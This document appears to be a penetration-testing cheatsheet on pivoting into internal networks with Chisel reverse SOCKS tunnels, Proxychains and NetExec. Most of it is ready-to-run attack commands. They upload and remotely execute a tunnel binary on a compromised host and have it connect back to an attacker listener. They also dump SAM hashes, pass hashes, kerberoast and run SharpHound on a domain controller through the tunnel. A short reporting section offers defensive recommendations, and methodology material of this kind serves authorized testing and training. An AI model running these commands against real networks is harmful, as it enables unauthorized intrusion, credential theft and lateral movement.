🛡️ Methodology Checklist
- Start Chisel server on attacker:
./chisel server --reverse - Upload Chisel to pivot:
nxc smb [PIVOT] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe - Connect pivot back:
nxc smb [PIVOT] -u [USER] -p [PASS] -x "C:\\Windows\\Temp\\chisel.exe client [LHOST]:8080 R:socks" - Verify SOCKS listener:
netstat -lnpt | grep 1080 - Configure Proxychains: ensure
socks5 127.0.0.1 1080in [ProxyList] - Attack internal targets:
proxychains4 -q nxc smb [INTERNAL] -u [USER] -p [PASS] --shares - Cleanup:
nxc smb [PIVOT] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force"
🎯 Operational Context
Use when: Internal network accessible only through a pivot — run nxc through proxychains to attack internal targets from external position.
Think Dumber First: proxychains4 -q nxc smb [INTERNAL_SUBNET]/24 — same nxc commands, just prefixed with proxychains4 -q. The -q suppresses proxychains output noise. Ensure SOCKS proxy is running first.
Skip when: Direct network access available — proxychains adds latency; use direct connection where possible.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
./chisel server --reverse | Start Chisel server on attacker with reverse tunnel enabled |
nxc smb [PIVOT_IP] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe | Upload Chisel binary to pivot host via NXC |
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks" | Create reverse SOCKS tunnel from pivot back to attacker |
netstat -lnpt | grep 1080 | Verify local SOCKS listener is up on attacker |
sudo proxychains4 -q nxc smb [INTERNAL_TARGET] -u [USER] -p [PASS] --shares | Run NXC through Proxychains tunnel (-q = quiet) |
sudo proxychains4 -q nxc winrm [INTERNAL_TARGET] -u [USER] -p [PASS] | WinRM through pivot |
sudo proxychains4 -q nxc ldap [INTERNAL_DC_FQDN] -u [USER] -p [PASS] | LDAP through pivot |
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force" | Kill Chisel process on pivot (cleanup) |
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe server --socks5" | Alternative: pivot as Chisel server |
sudo chisel client [PIVOT_IP]:8080 socks | Alternative: connect from Linux to pivot SOCKS server |
🔬 Deep Dive & Workflow
Pivot Scenario
YOU (Kali) PIVOT HOST INTERNAL TARGET
10.10.14.33 ←── VPN ───→ 10.129.204.133 ←── LAN ───→ 172.16.1.10
(dual-homed)
172.16.1.5
Goal: Attack 172.16.1.10 via the pivot host
Tool: Chisel (SOCKS tunnel) + Proxychains + NXC
Method 1: Reverse Tunnel (Pivot calls back to attacker)
# ATTACKER: Download binaries
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz -O chisel.gz -q
gunzip -d chisel.gz && chmod +x chisel
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz -O chisel.exe.gz -q
gunzip -d chisel.exe.gz
# ATTACKER: Start reverse server
./chisel server --reverse
# → listening on 0.0.0.0:8080
# ATTACKER: Upload Chisel to pivot via NXC
nxc smb [PIVOT_IP] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe
# PIVOT: Connect back to attacker and open SOCKS tunnel
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks"
# → Command stays running (tunnel is active while process runs)
# ATTACKER: Verify tunnel is up
netstat -lnpt | grep 1080
# → 127.0.0.1:1080 LISTEN (chisel)
# ATTACKER: Configure Proxychains
grep -A 5 "\[ProxyList\]" /etc/proxychains.conf
# Must contain: socks5 127.0.0.1 1080
# If not: echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
# ATTACKER: Attack internal target through tunnel
sudo proxychains4 -q nxc smb 172.16.1.10 -u [USER] -p [PASS] --shares
sudo proxychains4 -q nxc smb 172.16.1.10 -u [USER] -p [PASS] --users
sudo proxychains4 -q nxc winrm 172.16.1.10 -u [USER] -p [PASS]
sudo proxychains4 -q nxc ldap 172.16.1.10 -u [USER] -p [PASS]
# ATTACKER: Cleanup — kill Chisel on pivot
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force"
# ATTACKER: Stop Chisel server
CTRL+CMethod 2: Pivot as SOCKS Server (Linux connects to Windows server)
# PIVOT: Start Chisel SOCKS server
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe server --socks5"
# → Chisel listens on pivot:8080
# ATTACKER: Connect to pivot as client
sudo chisel client [PIVOT_IP]:8080 socks
# → Creates local SOCKS listener on 127.0.0.1:1080
# Use Proxychains as before:
sudo proxychains4 -q nxc smb [INTERNAL_TARGET] -u [USER] -p [PASS] --sharesProxychains with NXC — Full Protocol Coverage
# SMB — shares, users, spray, dump
sudo proxychains4 -q nxc smb [TARGET] -u [USER] -p [PASS] --shares
sudo proxychains4 -q nxc smb [TARGET] -u [USER] -p [PASS] --sam
sudo proxychains4 -q nxc smb [TARGET] -u [USER] -H [HASH]
# WinRM — PowerShell remoting
sudo proxychains4 -q nxc winrm [TARGET] -u [USER] -p [PASS]
# LDAP — AD enumeration (FQDN required)
sudo proxychains4 -q nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txt
# MSSQL
sudo proxychains4 -q nxc mssql [TARGET] -u [USER] -p [PASS] -d [DOMAIN]
# SharpHound via proxychains (collect from internal DC)
sudo proxychains nxc smb [DC_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\SharpHound.exe -c All"Troubleshooting
# Tunnel up but NXC can't connect:
netstat -lnpt | grep 1080 # confirm listener exists
# → If no listener: Chisel process may have died on pivot — re-run
# Proxychains config wrong:
cat /etc/proxychains.conf | grep -A5 "\[ProxyList\]"
# → Must show: socks5 127.0.0.1 1080 (NOT socks4)
# Can pivot reach internal target?
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "ping -n 2 [INTERNAL_TARGET]"
# → If no reply: pivot can't reach that IP — wrong route
# DNS issues for LDAP/Kerberos through tunnel:
# Add internal DC FQDN to /etc/hosts
echo "[INTERNAL_DC_IP] [DC_FQDN]" >> /etc/hosts
# Too much Proxychains output noise:
# Use -q (quiet mode): proxychains4 -q nxc ...🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| proxychains nxc hangs | SOCKS proxy not running | Verify tunnel: netstat -lnpt | grep [SOCKS_PORT]; restart SSH -D or Chisel tunnel |
| nxc through proxychains very slow | High latency through pivot | Use fewer threads: default nxc threading; avoid -t override through tunnel |
| DNS resolution fails through proxychains | Proxychains DNS not routed | Add target IPs to /etc/hosts; use IP not hostname; or set proxy_dns in proxychains.conf |
| SMB scan shows no hosts | Subnet not routed through tunnel | Confirm route: proxychains4 curl http://[INTERNAL_IP]; basic HTTP test before SMB |
| proxychains4 not found | Wrong package | Install: apt install proxychains4; note: proxychains and proxychains4 are different packages |
📝 Reporting Trigger
Finding Title: Internal Network Attacked via nxc Through SOCKS Pivot Impact: Running nxc through a SOCKS proxy pivot provides complete attack capability against internal network resources from an external position, demonstrating that network segmentation alone is insufficient when an internal host is compromised. Root Cause: Compromised host with access to multiple network segments allows external attacker to proxy all attack traffic through the internal pivot. Recommendation: Implement network micro-segmentation limiting pivot host connectivity. Deploy east-west traffic monitoring to detect unusual internal SMB/LDAP scanning patterns. Alert on bulk authentication attempts originating from non-DC internal hosts.